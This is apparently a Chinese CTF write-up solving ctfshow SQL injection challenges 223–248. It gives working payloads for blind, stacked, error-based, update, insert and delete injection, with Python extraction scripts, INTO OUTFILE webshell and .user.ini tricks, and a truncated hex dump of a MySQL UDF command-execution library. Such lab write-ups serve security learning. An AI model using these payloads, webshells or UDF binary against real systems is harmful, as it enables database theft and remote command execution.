select * from ctfshow_user group by 1,if(1=1,sleep(1),1);

web223

image-20220408214846588

image-20220408215003341

image-20220408215023841

显然可以盲注

数字被禁了可以使用true绕过

web224

image-20220408220113624

image-20220408220136403

image-20220408220153265

重置成admin admin登录一下

web225

堆叠注入 handler读数据

image-20220408221302428

没有过滤show

/api/?username=1';show databases;&page=1&limit=10

image-20220408221705966

/api/?username=1';show tables;&page=1&limit=10

image-20220408221725973

/api/?username=1';show tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;handler ctfshow_flagasa close;&page=1&limit=10

预处理

/api/?username=1';SET @sqli=concat(char(115,101,108,101,99,116),' database()');PREPARE st from @sqli;EXECUTE st;&page=1&limit=10

预处理

使用方法

mysql将prepare execute deallocate统称为 PREPARE STATEMENT.

PREPARE name from '[my sql sequece]';	#预定义sql语句
EXECUTE name; 						#执行预定义的sql语句
(DEALLOCATE || DROP) PREPARE name; 		#珊瑚预定义sql语句 	

字符串定义预处理

PREPARE stmt1 FROM 'SELECT SQRT(POW(?,2) + POW(?,2)) AS hypotenuse';
ET @a = 3;
SET @b = 4;
EXECUTE stmt1 USING @a, @b;

变量定义预处理sql

SET @s = "SELECT SQRT(POW(?,2) + POW (?,2)) AS hypotenuse";
PREPARE stmt2 FROM @s;
SET @c = 6;
ET @d = 8;
EXECUTE stmt2 USING @c,@d;
DEALLOCATE PREPARE stmt2;

常规堆叠注入

习惯扫目录,没扫到

image-20220315150640013

输入单引号,报错得出数据库mariadb

1' or 1=1#回显正常

image-20220315150758543

1' order by 3#报错

image-20220315151004003

1' order by 2#正常

image-20220315151033307

-1' union select 1,2#发现有过滤

image-20220315151126218

大小写也绕不过

那么只能堆叠注入了

1';show databases;#

image-20220315151331036

11';show tables;#

image-20220315151416056

这里查看一个flag在那个字段里

1';desc `1919810931114514`;#

image-20220315151658903

查一下下一个

1';desc `words`;# 这里也可以不加`` 

image-20220315151902329

那么这里面的id就有可能是我们查询时输入的值了,他的查询语句就可能是

select id,data from words where id=''

如果是这样的话,我们就可以将这里的words替换成1919810931114514将flag替换成id从而实现获取数据.那么可以将1919810931114514改名为words,在这之前需要先将words改下名,改成别的如word1.将flag改成data.但是在1919810931114514并没有id这个列名,那么我们可以给他添加一组id.

1';rename table words to word1;rename table `1919810931114514` to words;alter table words add id int unsigned not NULL auto_increment primary key; alter table words change flag data varchar(100);#

接着才查询1

image-20220315152912904

预处理语句

用法

SER @tn = 'hahaha'; 					#存储表名
SET @sql =concat('select * from ',@tn);	#存储sql语句
PREPARE name from @sql; 				#预处理sql语句
EXECUTE name; 							#执行预定义sql语句
(DEALLOCATE || DROP) PREPARE sqla; 		#删除预定义sql

本题即可利用char()函数将select的ascii码转换成select字符串,接着利用concat()函数进行拼接得到select查询语句从而绕过过滤.或者直接使用concat()函数拼接select来绕过

char(115,101,108,101,99,116)等价于select'
1';SET @sqli=concat(char(115,101,108,101,99,116),'* from `1919810931114514`');PREPARE st from @sqli;EXECUTE st;#

或者

1';PREPARE st from concat('s','elect', ' * from `1919810931114514` ');EXECUTE st;#
1';SET @sqli=concat(char(115,101,108,101,99,116),' database()');PREPARE st from @sqli;EXECUTE st;
/api/?username=1';SET @sqli=concat(char(115,101,108,101,99,116),' database()');PREPARE st from @sqli;EXECUTE st;&page=1&limit=10

web226

16进制预处理堆叠注入

image-20220409101024519

/api/?username=1';prepare s from 0x73656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d64617461626173652829;execute s;&page=1&limit=10

记得十六进制前面加0x哦

image-20220409101420720

字段名

/api/?username=1';prepare s from 0x73656c6563742067726f75705f636f6e63617428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f6e616d653d2763746673685f6f775f666c6167617327;execute s;&page=1&limit=10

数据

/api/?username=1';prepare s from 0x73656c65637420666c61676173622066726f6d2063746673685f6f775f666c61676173;execute s;&page=1&limit=10

web227

image-20220409101938137

这道题考点其实是查看MySQL的存储过程.看看网上这篇文章MySQL——查看存储过程和函数.我们去查information_schema.routines表

/api/?username=1';prepare s from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573;execute s;&page=1&limit=10

image-20220409102115511

web228

和226差不多

/api/?username=1';prepare s from 0x73656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d64617461626173652829;execute s;&page=1&limit=10

image-20220409102337468

/api/?username=1';prepare s from 0x73656c6563742067726f75705f636f6e63617428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f6e616d653d2763746673685f6f775f666c61676173616127;execute s;&page=1&limit=10
/api/?username=1';prepare s from 0x73656c65637420666c6167617362612066726f6d2063746673685f6f775f666c616761736161;execute s;&page=1&limit=10

web229

image-20220409102757765

/api/?username=1';prepare s from 0x73656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d64617461626173652829;execute s;&page=1&limit=10
/api/?username=1';prepare s from 0x73656c6563742067726f75705f636f6e63617428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f6e616d653d27666c616727;execute s;&page=1&limit=10
/api/?username=1';prepare s from 0x73656c65637420666c6167617362612066726f6d20666c6167;execute s;&page=1&limit=10

web230

image-20220409103050744

/api/?username=1';prepare s from 0x73656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d64617461626173652829;execute s;&page=1&limit=10
/api/?username=1';prepare s from 0x73656c6563742067726f75705f636f6e63617428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f6e616d653d27666c6167616162627827;execute s;&page=1&limit=10
/api/?username=1';prepare s from 0x73656c65637420666c616761736261732066726f6d20666c61676161626278;execute s;&page=1&limit=10

web231

updata注入

image-20220409103315126

update ctfshow_user set pass = '{$password}' where username = '{$username}';

image-20220409103537495

还是这里找发送参数

简单闭合一下

update ctfshow_user set pass = '1',username=user() where 1=1#' where username = '1';

image-20220409103848475

POST
password=1',username=user()#&username=1

image-20220409103833385

POST
password=1',username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) #&username=1
POST
password=1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga')#&username=1
POST
password=1',username=(select flagas from flaga)#&username=1
password=1',username=(select a from (select group_concat(flagas)a from flaga) 1) ;#&username=1

web232

image-20220409104334331

POST
password=1'),username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#&username=1

image-20220409105435149

POST
password=1'),username=(select group_concat(column_name) from information_schema.columns where table_name='flagaa')#&username=1
password=1'),username=(select flagass from flagaa)#&username=1
password=1'),username=(select a from (select group_concat(flagas)a from flaga) 111) ;#&username=1

web233

updata盲注

image-20220409105751661

盲注

测试

import requests
url = "http://ad2cbb74-6e31-4f3d-bffc-6d989a5760f7.challenge.ctf.show/api/"
payload = "length(database())=0" #没延迟
payload = "length(database())>0" #延迟
date = {
    'username': f"1' or if({payload},sleep(0.05),1) #",
    'password': "0"
}
try:
    r = requests.post(url, data=date, timeout=0.9)
    print('没延迟')
except Exception as e:
    print('延迟')
"""
Author:Y4tacker
"""
import requests

url = "http://4f5b7639-6d01-45c4-9610-e11239ba8c90.chall.ctf.show/api/?page=1&limit=10"

result = ""
i = 0

while 1:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查表名
        # payload = "select column_name from information_schema.columns where table_name='flag233333' limit 1,1"
        # 查数据
        payload = "select flagass233 from flag233333"
        data = {
            'username': f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.05),1)#",
            'password': '4'
        }
        try:
            r = requests.post(url, data=data, timeout=0.9)
            tail = mid
        except Exception as e:
            head = mid + 1
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)


web234

\逃逸字符

image-20220409115745252

单引号被过滤了,但是可以通过 \ 逃逸字符

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

就像这样,我们给pass传入一个 \ 那么这个’就被转义了

$sql = "update ctfshow_user set pass = '\' where username = '$username';";

也就是这个才是’\’ where username = 'pass那么后面的username自然就受我们控制了,比如我们这样闭合

$sql = "update ctfshow_user set pass = '\' where username = ',username=select database()#';";

,username=select database()#这一部分就是我们传入的username的值

image-20220409115907938

image-20220409115915740

传数据库名的时候记得用十六进制哦 ‘’ 被过滤了

username=,username=(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167323361)#&password=\

web235

无列名注入

image-20220409120324788

概述MySQL统计信息 CTF|mysql之无列名注入

username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#&password=\

image-20220409120611609

image-20220409120634772

username=,username=(select b from (select 1,2 as b,3 union select * from flag23a1 limit 1,1)a)#&password=\

或者

username=,username=(select `2` from(select 1,2,3 union select * from flag23a1 limit 1,1)a)#&password=\

web236

image-20220409120851488

username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#&password=\

image-20220409120950191

image-20220409120958493

image-20220409121038900

image-20220409121050832

web237

inster注入

image-20220409121236464

username=3',(select group_concat(table_name) from information_schema.tables where table_schema=database()))#&password=1

image-20220409121533936

image-20220409121540848

username=3',(select group_concat(column_name) from information_schema.columns where table_name='flag'));-- A&password=1
username=3',(select flagass23s3 from flag));-- A&password=1

web238

过滤空格

image-20220409121935402

username=3',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())));#&password=1

image-20220409122028791

image-20220409122041955

username=3',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flagb')));#&password=1
username=3',(select(flag)from(flagb)));#&password=1

web239

过滤or 空格

image-20220409123445710

username=1',(select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())))#&password=1

image-20220409123642991

image-20220409123657096

不会查列名

username=1',(select(flag)from(flagbb)));#&password=1

web240

image-20220409124924898

import random
import requests

url = "http://d9a27e7b-ab91-4d9e-86c7-89a30a22acf3.challenge.ctf.show"
url_insert = url + "/api/insert.php"
url_flag = url + "/api/?page=1&limit=1000"


# 看命函数
def generate_random_str():
    sttr = 'ab'
    str_list = [random.choice(sttr) for i in range(5)]
    random_str = ''.join(str_list)
    return random_str


while 1:
    data = {
        'username': f"1',(select(flag)from(flag{generate_random_str()})))#",
        'password': ""
    }
    r = requests.post(url_insert, data=data)
    r2 = requests.get(url_flag)
    if "ctfshow{" in r2.text:
        for i in r2.json()['data']:
            if  "ctfshow{" in i['pass']:
                print(i['pass'])
                break
        break

web241

delete注入

image-20220409125442979

"""
Author:feng
"""
import requests
from time import *
def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
        return num

url='http://224c4817-ece7-46e4-a9a5-185fdce4e641.chall.ctf.show:8080/api/delete.php'

flag=''
for i in range(1,100):
    min=32
    max=128
    while 1:
        j=min+(max-min)//2
        if min==j:
            flag+=chr(j)
            print(flag)
            if chr(j)=='}':
                exit()
            break

        #payload="if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{},sleep(0.01),1)".format(i,j)
        #payload="if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),{},1))<{},sleep(0.01),1)".format(i,j)
        payload="if(ascii(substr((select group_concat(flag) from flag),{},1))<{},sleep(0.01),1)".format(i,j)

        data={
            'id':payload
        }
        try:
            r=requests.post(url=url,data=data,timeout=0.2)
            min=j
        except:
            max=j

        sleep(0.2)
    sleep(1)

web242

文件读写

image-20220409131541223

SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']//分隔符
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]

“OPTION”参数为可选参数选项,其可能的取值有:

`FIELDS TERMINATED BY '字符串'`:设置字符串为字段之间的分隔符,可以为单个或多个字符。默认值是“\t”。

`FIELDS ENCLOSED BY '字符'`:设置字符来括住字段的值,只能为单个字符。默认情况下不使用任何符号。

`FIELDS OPTIONALLY ENCLOSED BY '字符'`:设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。默认情况下不使用任何符号。

`FIELDS ESCAPED BY '字符'`:设置转义字符,只能为单个字符。默认值为“\”。

`LINES STARTING BY '字符串'`:设置每行数据开头的字符,可以为单个或多个字符。默认情况下不使用任何字符。

`LINES TERMINATED BY '字符串'`:设置每行数据结尾的字符,可以为单个或多个字符。默认值是“\n”。

  • FIELDS TERMINATED BY
  • LINES STARTING BY
  • LINES TERMINATED BY
filename=1.php' fields terminated by '<?php eval($_REQUEST[1]);?>'#

接着访问dump/1.php

image-20220409131756459

web243

image-20220409131947051

有index.php,上传.user.ini,不过要注意一下上传的格式

过滤了php,那么使用.user.ini进行文件包含,传入一个图片马,再使index.php包含图片马即可。具体操作如下:
先上传.user.ini(其中在每行开头加了;用于注释掉从表ctfshow_user中读出的内容):

filename=.user.ini' LINES STARTING BY ';' TERMINATED BY 0x0a6175746f5f70726570656e645f66696c653d7a662e6a70670a#

.user.ini的结果类似于:

image-20220409132736975

再上传图片马

filename=zf.jpg' lines starting by '<?=eval($_POST[zf]);?>'#

web244

报错注入

image-20220409132921712

image-20220409132917871

extractvalue()

api/?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))-- #&page=1&limit=10

updatexml()

/api/?id=1' or updatexml(1,concat(1,(database())),1) -- #&page=1&limit=10

floor()

/api/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand(0)*2)) as a from information_schema.columns group by a-- #&page=1&limit=10

ceil()

/api/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,ceil(rand(0)*2)) as a from information_schema.columns group by a-- #&page=1&limit=10

round()

/api/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,round(rand(0)*2)) as a from information_schema.columns group by a-- #&page=1&limit=10

都试一下咯

模板
/api/?id=1' or updatexml(1,concat(1,([])),1) -- #&page=1&limit=10

表名
/api/?id=1' or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) -- #&page=1&limit=10

字段名
/api/?id=1' or updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flag')),1) -- #&page=1&limit=10

数据 分开读
/api/?id=1' or updatexml(1,concat(1,(select left(flag,30) from ctfshow_flag)),1) -- #&page=1&limit=10		ctfshow{35d09f15-bd71-4970-90c
/api/?id=1' or updatexml(1,concat(1,(select right(flag,27) from ctfshow_flag)),1) -- #&page=1&limit=10			d71-4970-90ca-56b17f14ccb0}

image-20220409135233790

web245

image-20220409135326914

api/?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))-- #&page=1&limit=10
模板
api/?id=1' and extractvalue(1,concat(0x7e,([]),0x7e))-- #&page=1&limit=10

表名
api/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))-- #&page=1&limit=10

字段名
api/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagsa'),0x7e))-- #&page=1&limit=10

数据 分开读
api/?id=1' and extractvalue(1,concat(0x7e,(select left(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10			ctfshow{1232f3e3-1688-483c-a48
api/?id=1' and extractvalue(1,concat(0x7e,(select right(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10			3-1688-483c-a483-990657e35c81}

web246

image-20220409135940440

/api/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand(0)*2)) as a from information_schema.columns group by a-- #&page=1&limit=10
模板
/api/?id=1' union Select 1,count(*),concat(0x3a,0x3a,([]),0x3a,0x3a,floor(rand(0)*2)) as a from information_schema.columns group by a-- #&page=1&limit=10

表名
/api/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a,floor(rand(0)*2)) as a from information_schema.columns group by a-- #&page=1&limit=10

字段名
/api/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='ctfshow_flags' limit 1,1),0x3a,0x3a,floor(rand(0)*2)) as a from information_schema.columns group by a-- #&page=1&limit=10

数据
/api/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select flag2 from ctfshow_flags),0x3a,0x3a,floor(rand(0)*2)) as a from information_schema.columns group by a-- #&page=1&limit=10

web247

image-20220409140732039

/api/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,ceil(rand(0)*2)) as a from information_schema.columns group by a-- #&page=1&limit=10

/api/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,round(rand(0)*2)) as a from information_schema.columns group by a-- #&page=1&limit=10
模板
/api/?id=1' union Select 1,count(*),concat(0x3a,0x3a,([]),0x3a,0x3a,floor(rand(0)*2)) as a from information_schema.columns group by a-- #&page=1&limit=10

表名
/api/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a,ceil(rand(0)*2)) as a from information_schema.columns group by a-- #&page=1&limit=10

字段名
/api/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='ctfshow_flagsa' limit 1,1),0x3a,0x3a,ceil(rand(0)*2)) as a from information_schema.columns group by a-- #&page=1&limit=10

数据
/api/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select `flag?` from ctfshow_flagsa),0x3a,0x3a,ceil(rand(0)*2)) as a from information_schema.columns group by a-- #&page=1&limit=10

可以看到这个字段名flag?加了反引号,原因是:表名和字段名都可以用反引号引起来,这是用来区分MYSQL的保留字与普通字段.表名、字段名、数据库名等可用反引号 ( ` ),也可以不使用反引号 ,但如果它包含特殊字符或保留字,则必须使用,如果不使用就会报错

web248

udf注入

#参考脚本
#环境:Linux/MariaDB
import requests
 
url='http://89a7098e-03f5-47f3-9cb5-1f1cd3d640e9.challenge.ctf.show:8080/api/?id='
code='7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F00000000010000000000000000000